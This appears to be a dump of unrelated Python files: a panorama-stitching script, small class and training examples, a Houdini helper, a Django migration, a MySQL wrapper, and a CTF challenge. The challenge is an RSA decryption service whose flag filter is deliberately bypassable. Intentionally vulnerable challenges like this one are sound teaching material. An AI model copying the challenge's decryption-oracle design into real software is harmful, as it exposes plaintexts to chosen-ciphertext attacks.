else:
raise ValueError
def batch_gen(batch_size: int, gen: Generator[np.ndarray, None, None]) -> Generator[np.ndarray, None, None]:
batch = []
for a in de_batch_gen(gen):
batch.append(a)
if len(batch) == batch_size:
yield np.stack(batch)
batch = []
if len(batch) > 0:
yield np.stack(batch)
class StitchSource(ABC):
def __init__(self, recording: Recording, rgb: bool):
self.rgb = rgb
self.recording = recording
self.num_frames = len(self.recording.raw.frames)
@property
@abstractmethod
def should_video(self) -> bool:
pass
@property
@abstractmethod
def video_name(self) -> str:
pass
@property
@abstractmethod
def dtype(self) -> str:
pass
@property
@abstractmethod
def shape(self) -> Tuple[int, int, int, int]:
pass
@property
@abstractmethod
def get_frames(self) -> Generator[np.ndarray, None, None]:
pass
@property
def dataset_name(self) -> str:
return "rgb" if self.rgb else "depth"
@property
@abstractmethod
def pbar_desc(self) -> str:
pass
class PanoramaStitchSource(StitchSource):
def __init__(self, recording: Recording, lut, batch_size: int, spherical: bool, rgb: bool):
super().__init__(recording, rgb)
self.spherical = spherical
self.batch_size = batch_size
if not isinstance(lut, Path):
lut = Path(lut)
self.lut = np.load(lut.absolute().resolve())
@property
def should_video(self) -> bool:
return self.rgb
@property
def video_name(self) -> str:
return "spherical.mkv" if self.spherical else "cylindrical.mkv"
@property
def get_frames(self) -> Generator[np.ndarray, None, None]:
return batch_gen(100, _stich(self))
@property
def dtype(self) -> str:
if self.rgb:
return 'uint8'
else:
return 'uint16'
@property
def shape(self) -> Tuple[int, int, int, int]:
return self.num_frames, self.lut.shape[0], self.lut.shape[1], 3 if self.rgb else 1
@property
def pbar_desc(self) -> str:
return f"Stitching {'spherical' if self.spherical else 'cylindrical'} {'RGB' if self.rgb else 'Depth'} frames"
class SideStitchSource(StitchSource):
def __init__(self, recording: Recording, side: Side, rgb: bool):
super().__init__(recording, rgb)
self.side = side
@property
def should_video(self) -> bool:
return self.side is Side.Front and self.rgb
@property
def video_name(self) -> str:
return "front.mkv"
@property
def get_frames(self) -> Generator[np.ndarray, None, None]:
yield np.stack(list(self._frames()))
def _frames(self):
data = r.raw[side]
for frame in data.frames:
if self.rgb:
yield frame.rgb_data
else:
yield frame.depth_data[:, :, np.newaxis]
@property
def dtype(self) -> str:
if self.rgb:
return 'uint8'
else:
return 'uint16'
@property
def shape(self) -> Tuple[int, int, int, int]:
return self.num_frames, IMAGE_WIDTH, IMAGE_HEIGHT, 3 if self.rgb else 1
@property
def pbar_desc(self) -> str:
return f"Collecting {self.side.name.lower()} frames"
def _batch_frames(frames, batch_size, im_shape, im_dtype, spherical: bool,
rgb: bool):
batch_i = 0
batch = np.empty(shape=(batch_size,) + im_shape, dtype=im_dtype)
for i in range(len(frames)):
frame = frames[i]
if rgb:
imB = frame[Side.Back].rgb_data
imF = frame[Side.Front].rgb_data
imL = frame[Side.Left].rgb_data
imR = frame[Side.Right].rgb_data
if spherical:
imT = frame[Side.Top].rgb_data
imBo = frame[Side.Bottom].rgb_data
im = np.concatenate([imB, imL, imF, imR, imT, imBo], axis=1)
else:
im = np.concatenate([imB, imL, imF, imR], axis=1)
else:
imB = frame[Side.Back].depth_data
imF = frame[Side.Front].depth_data
imL = frame[Side.Left].depth_data
imR = frame[Side.Right].depth_data
if spherical:
imT = frame[Side.Top].depth_data
imBo = frame[Side.Bottom].depth_data
im = np.concatenate([imB, imL, imF, imR, imT, imBo], axis=1)
else:
im = np.concatenate([imB, imL, imF, imR], axis=1)
im = np.expand_dims(im, -1)
batch[batch_i] = im
if batch_i == batch_size - 1:
yield batch
batch = np.empty(shape=(batch_size,) + im_shape, dtype=im_dtype)
batch_i = 0
else:
batch_i += 1
if batch_i > 0:
yield batch[:batch_i]
def _stich(source: PanoramaStitchSource):
im_type = source.dtype
if source.rgb:
im_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 3)
else:
im_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 1)
if source.spherical:
concat_shape = (im_shape[0], im_shape[1] * 6, im_shape[2])
else:
concat_shape = (im_shape[0], im_shape[1] * 4, im_shape[2])
frames = source.recording.raw.frames
if not source.spherical:
size = source.lut.shape[1] // 4
t = np.pi / 4
thetas = np.linspace(-t, t, size)
all_thetas = np.concatenate((thetas[size // 2:],
thetas,
thetas,
thetas,
thetas[:size // 2]))
depth_multiplier = 1 / np.cos(all_thetas)
depth_multiplier = depth_multiplier[np.newaxis, np.newaxis, :]
depth_multiplier = depth_multiplier.astype('float32')
# depth_multiplier = np.float32(1)
else:
depth_multiplier = source.lut[:, :, 2].astype('float32')
for batch in _batch_frames(frames, source.batch_size, concat_shape, im_type,
source.spherical, source.rgb):
if not source.rgb:
mask = np.logical_not(batch == 10000).astype(
'float32') # 10000 or 9999? # np.isclose(batch, 10000, atol=0, rtol=0)
else:
mask = None
batch_frames = np.array(
stitch_image_tensors(source.lut[:, :, 0:2],
batch,
depth_multiplier,
mask, #TODO try without
source.rgb)).astype(im_type)
# if mask is not None:
# batch_frames[batch_frames == 0] = -1
if not source.rgb:
batch_frames = batch_frames[:, :, :, np.newaxis]
yield batch_frames
IMAGE_SAVE_POINT = 200
def _process(source: StitchSource, create_in):
shape = source.shape
dtype = source.dtype
dataset = create_in.create_dataset(source.dataset_name, shape=shape, dtype=dtype,
compression='gzip', compression_opts=4,
# compression='lzf',
shuffle=True,
fletcher32=True)
if source.should_video:
video_file = r.base_data_dir / source.video_name
if video_file.exists():
video_file.unlink()
if video_file.with_suffix(".png").exists():
video_file.with_suffix(".png").unlink()
n, height, width, channels = shape
process = (
ffmpeg
.input('pipe:', format='rawvideo',
pix_fmt='rgb24',
s='{}x{}'.format(width, height))
.output(str(video_file), pix_fmt='yuv420p',
vcodec='libx264')
.overwrite_output()
.global_args('-loglevel', 'quiet', "-preset", "ultrafast", "-crf", "12")
)
process = process.run_async(pipe_stdin=True)
pbar = tqdm(
desc=source.pbar_desc,
unit='frame',
total=shape[0],
mininterval=0)
i = 0
for frame in source.get_frames:
if np.ndim(frame) == 4:
# multiple frames
dataset[i:i + len(frame), :, :, :] = frame
# if not source.rgb:
# depth = frame[0][:, :, 0]
# depth[depth >= 10000] = 10000
# plt.imshow(depth, cmap='gray', vmin=0, vmax=np.max(depth))
# plt.show()
# print()
if source.should_video:
for f in frame:
process.stdin.write(f.tobytes())
if i <= IMAGE_SAVE_POINT < i + len(frame):
imageio.imwrite(str(video_file.with_suffix(".png")), frame[IMAGE_SAVE_POINT - i])
i += len(frame)
pbar.update(len(frame))
elif np.ndim(frame) == 3:
# single frame
dataset[i, :, :, :] = frame
if source.should_video:
process.stdin.write(frame.tobytes())
if i == IMAGE_SAVE_POINT:
imageio.imwrite(str(video_file.with_suffix(".png")), frame)
i += 1
pbar.update(1)
else:
raise ValueError(frame)
if source.should_video:
process.stdin.close()
process.wait()
gc.collect()
"""
Stats:
Gzip level 5: 2092s, 8.17 GB
No compression: 1345.46s, 36 GB
Gzip level 2: 1524.21s, 8.9 GB
Gzip level 3: 1724.21s, 8.4 GB
Gzip level 4: 1796.92s, 8.4 GB ** best so far
Gzip level 9: 9658.69s, 7.67 GB
LZF: 1261.98s, 13.5 GB
"""
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Stitch raw images into cylindrical and spherical "
"panoramas.")
parser.add_argument("cylindrical_lut",
help="Cylindrical lookup table file.")
parser.add_argument("spherical_lut",
help="Spherical lookup table file.")
parser.add_argument("--single", "-s",
action='append',
help="Stitch files in this single directory. Can be "
"specified multiple times.")
parser.add_argument("--all", "-a",
help="Stitch all files for all recordings in this "
"base directory.")
parser.add_argument("--batch_size", "-b",
type=int,
default=30,
help="Batch size used for stitching")
parser.add_argument("--no_cylindrical",
action='store_true',
help="Skip cylindrical stitching (and lut if "
"specified).")
parser.add_argument("--no_spherical",
action='store_true',
help="Skip spherical stitching (and lut if specified).")
parser.add_argument("--overwrite", "-o",
action='store_true',
help="Skip spherical stitching (and lut if specified).")
parser.add_argument("--do_uploaded", "-u",
action='store_true',
help="Re-stitch even if it has been uploaded (./uploaded exists)")
args = parser.parse_args()
if args.single is not None:
recordings = [Recording.from_dir(d) for d in args.single]
elif args.all is not None:
recordings = Recording.all_in_dir(args.all)
else:
print(
"No recording directories specified. Use --all/-a or --single/-s")
quit()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# TODO detect existing
pbar = tqdm(recordings, desc="Recordings", unit='recording')
for r in pbar:
r: Recording
pbar.set_postfix_str("Recording: " + str(r.base_data_dir))
cylindrical_file = r.base_data_dir / "cylindrical.hdf5"
spherical_file = r.base_data_dir / "spherical.hdf5"
pinhole_file = r.base_data_dir / "pinhole.hdf5"
if r.is_uploaded and not args.do_uploaded:
print(f"Stitched data for {r.base_data_dir} has already been uploaded, skipping")
continue
if cylindrical_file.exists() or spherical_file.exists() or pinhole_file.exists():
if args.overwrite:
if cylindrical_file.exists():
cylindrical_file.unlink()
if spherical_file.exists():
spherical_file.unlink()
if pinhole_file.exists():
pinhole_file.unlink()
elif args.all is not None:
if cylindrical_file.exists() and spherical_file.exists() and pinhole_file.exists():
print(f"Data already exists, skipping: {r.base_data_dir}")
continue
else:
raise FileExistsError(f"Some data exists for {r.base_data_dir}, but not all of it")
else:
raise FileExistsError("Data already exists")
try:
if not args.no_cylindrical:
with h5py.File(str(cylindrical_file), "w") as file:
_process(PanoramaStitchSource(r, args.cylindrical_lut, args.batch_size, False, True), file)
_process(PanoramaStitchSource(r, args.cylindrical_lut, args.batch_size, False, False), file)
if not args.no_spherical:
with h5py.File(str(spherical_file), "w") as file:
_process(PanoramaStitchSource(r, args.spherical_lut, args.batch_size, True, True), file)
_process(PanoramaStitchSource(r, args.spherical_lut, args.batch_size, True, False), file)
# save pinhole frames in matching formats
with h5py.File(str(pinhole_file), "w") as file:
for side in tqdm(list(Side), desc="Saving sides", unit="side", total=len(list(Side))):
side_group = file.create_group(side.name.lower())
_process(SideStitchSource(r, side, True), side_group)
_process(SideStitchSource(r, side, False), side_group)
except Exception as e:
if cylindrical_file.exists():
cylindrical_file.unlink()
if spherical_file.exists():
spherical_file.unlink()
if pinhole_file.exists():
pinhole_file.unlink()
print("Errored on", r.base_data_dir)
# raise e
|
class Car:
"""Базовый класс автомобиля"""
def __init__(self, marka, speed):
""" инициализирует атрибуты марки и скорости автомобиля"""
self.marka = marka
self.speed = speed
self.odometr_reading = 0
def car_ride(self):
return "машинка " + self.marka+" едет со скоростью "+ str(self.speed)
def read_odometr(self):
"""Выведет нам пробег автомобиля """
print("У этого автомобиля пробег " + str(self.odometr_reading) + "на счетчике")
def update_odometr(self, mileage):
self.odometr_reading = mileage
|
from math import exp
from math import log
import numpy as np
import linsepexamples
def sigmoid(arg):
return 1 / ( 1 + exp(-arg))
def log_create(name_datafile):
open(name_datafile, 'w').close()
def log_set(name_datafile, name_set, examples_set):
with open(name_datafile, 'a') as log_set:
log_set.write("\n\n" + name_set + " : \n\n")
for example in examples_set:
log_set.write(str(example) + "\n")
# Cross Entropy is loss function:
# L(D) = - 1/n * ( y1 * ln(f(x1)) + (1 - y1) * (ln(1 - f(x1))) + ...
# ... + yn * ln(f(xn)) + (1 - yn) * (ln(1 - f(xn)))),
# Where n - size of batch; yi - mark on example i; xi - example i; f - sigmoid(linearcomb)
# Note : end_index not include
def cross_entropy(trained_weights, examples_set, index_begin_example, index_end_example):
cr_entropy = np.float128(0)
for index_example in range(index_begin_example, index_end_example):
for_show = 1 - sigmoid(np.dot(trained_weights, examples_set[index_example][0]))
mini_const = 7e-300
cr_entropy -= \
examples_set[index_example][1] * \
log(sigmoid(np.dot(trained_weights, examples_set[index_example][0])) + mini_const) + \
(1 - examples_set[index_example][1]) * \
log(1 - sigmoid(np.dot(trained_weights, examples_set[index_example][0])) + mini_const)
return cr_entropy / (index_end_example - index_begin_example)
def gradient_cross_entropy(trained_weights, examples_set, index_example):
list_for_gradient = []
sigmoid_value = sigmoid(np.dot(trained_weights, examples_set[index_example][0]))
mark_of_class = examples_set[index_example][1]
for index_gradient_component in range(len(trained_weights)):
component_of_gradient = (mark_of_class * (1 - sigmoid_value) - (1 - mark_of_class) * \
sigmoid_value) * examples_set[index_example][0][index_gradient_component]
list_for_gradient.append(component_of_gradient)
gradient_loss = np.array(list_for_gradient)
return gradient_loss
def update_trained_weights(trained_weights, gradient_loss, learning_rate):
trained_weights += learning_rate * gradient_loss
def stochastic_gradient_descent(trained_weights, training_set, learning_rate):
for index_example in range(len(training_set)):
gradient_loss = gradient_cross_entropy(trained_weights, training_set, index_example)
update_trained_weights(trained_weights, gradient_loss, learning_rate)
def do_train():
dimensions = [400, 40]
name_datafile = 'neuron_data.txt'
name_lossesfile = 'neuron_loss.txt'
count_training_examples = 1000
count_tests_examples = 1000
count_ages = 1000
learning_rate = np.float128(0.0005)
trained_weights = np.array([np.float128(0.5)] * len(dimensions))
log_create(name_datafile)
log_create(name_lossesfile)
training_set = linsepexamples.generate_linear_separable_examples( \
count_training_examples, dimensions)
log_set(name_datafile, "Training set", training_set)
test_set = linsepexamples.generate_linear_separable_examples( \
count_tests_examples, dimensions)
log_set(name_datafile, "Test set", test_set)
with open(name_lossesfile, "w") as log_losses:
for number_age in range(count_ages):
stochastic_gradient_descent(trained_weights, training_set, learning_rate)
loss = cross_entropy(trained_weights, test_set, 0, len(test_set))
learning_rate *= 0.95
log_losses.write(" Age " + str(number_age) + ", Loss " + str(loss) + \
" Weights " + str(trained_weights) + "\n")
do_train()
|
#!/usr/local/bin/python
from Crypto.Util.number import getStrongPrime, bytes_to_long, long_to_bytes
f = open("flag.txt").read()
m = bytes_to_long(f.encode())
p = getStrongPrime(512)
q = getStrongPrime(512)
n = p*q
e = 65537
c = pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
d = pow(e, -1, (p-1)*(q-1))
c = int(input("Text to decrypt: "))
if c == m or b"actf{" in long_to_bytes(pow(c, d, n)):
print("No flag for you!")
exit(1)
print("m =", pow(c, d, n)) |
"""This module contains functions related to Mantra Python filtering."""
# =============================================================================
# IMPORTS
# =============================================================================
# Standard Library Imports
import logging
import os
_logger = logging.getLogger(__name__)
# =============================================================================
# FUNCTIONS
# =============================================================================
def build_pyfilter_command(pyfilter_args=None, pyfilter_path=None):
"""Build a PyFilter -P command.
:param pyfilter_args: Optional list of args to pass to the command.
:type pyfilter_args: list(str)
:param pyfilter_path: Optional path to the filter script.
:type pyfilter_path: str
:return: The constructed PyFilter command.
:rtype: str
"""
import hou
if pyfilter_args is None:
pyfilter_args = []
# If no path was passed, use the one located in the HOUDINI_PATH.
if pyfilter_path is None:
try:
pyfilter_path = hou.findFile("pyfilter/ht-pyfilter.py")
# If we can't find the script them log an error and return nothing.
except hou.OperationFailed:
_logger.error("Could not find pyfilter/ht-pyfilter.py")
return ""
else:
# Ensure the script path exists.
if not os.path.isfile(pyfilter_path):
raise OSError("No such file: {}".format(pyfilter_path))
cmd = '-P "{} {}"'.format(pyfilter_path, " ".join(pyfilter_args))
return cmd
|
'''
Created on Mar 31, 2014
@author: tony
'''
import os
class Deleter():
'''
classdocs
'''
def fileDeleter(self,fileName):
os.remove(fileName)
print fileName + " has been removed!"
|
import asyncio
from alarme import Action
from alarme.extras.common import SingleRFDevice
class RfTransmitterAction(Action):
def __init__(self, app, id_, gpio, code, code_extra=0, run_count=1, run_interval=0.02):
super().__init__(app, id_)
self.gpio = gpio
self.code = code
self.code_extra = code_extra
self.run_count = run_count
self.run_interval = run_interval
self.rf_device = SingleRFDevice(self.gpio)
def _continue(self, run_count):
return self.running and (self.run_count is None or run_count < self.run_count)
async def run(self):
self.rf_device.enable_tx()
try:
run_count = 0
while self._continue(run_count):
self.rf_device.tx_code(self.code + self.code_extra)
run_count += 1
if self._continue(run_count):
await asyncio.sleep(self.run_interval)
finally:
self.rf_device.disable_tx()
|
# Generated by Django 3.0.5 on 2020-04-25 23:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('alunos', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='aluno',
old_name='schooL',
new_name='school',
),
]
|
import MySQLdb
class SQL:
def __init__(self):
self.db=None
description = "This is a class"
author = "Raaj"
def connectToSQLServer(self):
self.db=MySQLdb.connect(host="",
user="",
passwd="",
db="")
def runQuery(self,query):
print query
arr=[]
cur=self.db.cursor()
cur.execute(query)
for row in cur.fetchall():
arr.append(row)
print row
return arr |
#!/usr/bin/env python
#
# Copyright 2015-2020 Blizzard Entertainment. Subject to the MIT license.
# See the included LICENSE file for more information.
#
import os
import re
import imp
import sys
def _import_protocol(base_path, protocol_module_name):
"""
Import a module from a base path, used to import protocol modules.
This implementation is derived from the __import__ example here:
https://docs.python.org/2/library/imp.html
"""
# Try to return the module if it's been loaded already
if protocol_module_name in sys.modules:
return sys.modules[protocol_module_name]
# If any of the following calls raises an exception,
# there's a problem we can't handle -- let the caller handle it.
#
fp, pathname, description = imp.find_module(protocol_module_name, [base_path])
try:
return imp.load_module(protocol_module_name, fp, pathname, description)
finally:
# Since we may exit via an exception, close fp explicitly.
if fp:
fp.close()
def list_all(base_path=None):
"""
Returns a list of current protocol version file names in the versions module sorted by name.
"""
if base_path is None:
base_path = os.path.dirname(__file__)
pattern = re.compile(r'protocol[0-9]+\.py$')
files = [f for f in os.listdir(base_path) if pattern.match(f)]
files.sort()
return files
def latest():
"""
Import the latest protocol version in the versions module (directory)
"""
# Find matching protocol version files
base_path = os.path.dirname(__file__)
files = list_all(base_path)
# Sort using version number, take latest
latest_version = files[-1]
# Convert file to module name
module_name = latest_version.split('.')[0]
# Perform the import
return _import_protocol(base_path, module_name)
def build(build_version):
"""
Get the module for a specific build version
"""
base_path = os.path.dirname(__file__)
return _import_protocol(base_path, 'protocol{0:05d}'.format(build_version))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.